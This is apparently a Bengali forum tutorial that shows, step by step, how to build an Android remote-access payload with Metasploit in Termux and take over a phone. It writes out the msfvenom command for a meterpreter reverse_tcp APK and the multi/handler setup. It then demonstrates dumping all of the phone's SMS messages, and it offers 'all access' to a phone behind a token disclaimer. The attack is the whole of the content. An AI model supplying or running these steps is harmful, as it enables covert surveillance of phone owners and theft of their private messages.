আসসালামু আলাইকুম । আশা করি সকলে ভালো আছেন । আমিও আলহামদুলিল্লাহ আপনাদের দোয়ায় অনেক ভালো আছি ।
আজ আমি আপনাদের দেখাবো কিভাবে metasploit দিয়ে virus or payload তৈরি করতে হয়। এবং কিভাবে একটা ফোনের সকল কিছু access নিবেন প্রমাণ সহ। এইটা অবশ্যই কেউ খারাপ কাজে ব্যবহার করবেন না আর যদি করেন তাহলে trickbd ট্রিম এবং আমি দায়ী থাকবো না।
যা যা লাগবে :
১) আপনার ফোনে termux ইনস্টল থাকতে হবে ।
২ ) আপনার ফোনে metasploit ইনস্টল থাকতে হবে।
৩) আপনার ফোনে অবশ্যই নেই কানেকশন রাখবেন।
তো কাজে আশা যাক।
প্রথমে আমরা termux কে আপডেট করে নিবো তার জন্য কমান্ড pkg update -y লিখে ইন্টার ।
এখন আমরা termux কে আপগ্রেড করে নিবো তার জন্য কমান্ড pkg upgrade -y লিখে ইন্টার ।
এখন আমরা metasploit এর payload তৈরি করবো তার জন্য আমরা কমান্ড দিবো।
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > /sdcard/payload.apk
কমান্ড টা দিয়ে ইন্টার দিবো।
কয়েক সেকেন্ড সময় লাগবে payload টা তৈরি হতে। যদি সফল ভাবে তৈরি হয়ে যায় তাহলে এই রকম ইন্টার পেইজ দেখতে পারবেন।
দেখতে পাচ্ছে আমার payload টা তৈরি হয়ে গেছে। মাত্র ৯.৯৪ কেবি payload দ্বারা আপনার ফোনের সকল access নেওয়া সম্ভব। এখন আমরা payload কে ইনস্টল করবো। কিন্তু এখন ওপেন করবো না।
ইনস্টল হলে আমরা termux চলে যাবো। এখন আমরা রান করবো metasploit তাই msfconsole লিখে ইন্টার দিবো একটু সময় লাগবে রান হতে।
এখন আমরা মাল্টি handler এ চলে যাবো তার জন্য কমান্ড হলো use exploit /multi/handler লিখে ইন্টার করবো।
এখন বলে দিতে হবে আমরা কোন ধরনের payload ব্যবহার করছি। আমরা অবশ্যই reverse_tcp ব্যবহার করছি । এখন আমাদের কোন ফোনের জন্য payload তৈরি করছি সেটা বলতে হবে তার জন্য কমান্ড হলো set payload android/meterpreter/reverse_tcp লিখে ইন্টার করবো।
এখন আমাদের লোকাল হোস্ট দিতে হবে। আমরা যখন payload টা তৈরি করছি তখন যেই লোকাল হোস্ট টা ব্যবহার করছি এখন সেই লোকাল হোস্ট টা দিতে হবে। set LHOST 127.0.0.1 লিখে ইন্টার দিবো।
Payload তৈরি সময় আমরা যেই LPORT দিয়েছি এখন সেই LPORT দিয়ে ইন্টার করবো।
এখন আমরা রান করবো তাই run লিখে ইন্টার করবো।
রান করার পর এই রকম পেইজ দেখতে পারবেন। এখন আমরা যেই payload টা ইনস্টল করছি সেইটা একটা ক্লিক করবো ।
Payload টা active হলে এই রকম ইন্টার পেইজ দেখতে পারবেন। এবং meterpreter ওপেন হয়ে যাবে । এখন help আমরা পছন্দের কমান্ড নিয়ে আসবেন।
আমি আপনাদের প্রমাণ দেখানোর জন্য dump_sms কমান্ড নিয়ে ইন্টার করবো।
দেখতে পাচ্ছেন আমার ফোনের যত মেসেজ আছে সব একটি ফাইলে চলে আসছে। এই ফাইলটি দেখার জন্য আমরা termux এ হাতের বাম দিক থেকে ডান দিকে স্লাইড করবো।
এই রকম ইন্টার পেইজ আসবে এখন new session ক্লিক করবো ।
এখন ls দিয়ে ইন্টার দিবো। এবং দেখতে পাবো একটু আগে যেই dump_sms ফাইলটি সেভ হয়েছে সেইটি।
এখন আমরা ফাইলটি ওপেন করবো তার জন্য cat লিখে ফাইলের নাম টা কপি করে নিয়ে আসবো এবং ইন্টার ক্লিক করবো ।
এখন দেখতে পাচ্ছেন আমার ফোনে মোট ১৩৯৭ টি মেসেজ আছে । একটি মেসেজের সব details দেখতে পাবেন।
তো আজ এই পর্যন্তই ভালো থাকবেন। বুঝতে সমস্যা হলে কমেন্ট করবেন। লেখায় যদি কোন ভুল হয়ে থাকে তাহলে ক্ষমা দৃষ্টিতে দেখবেন।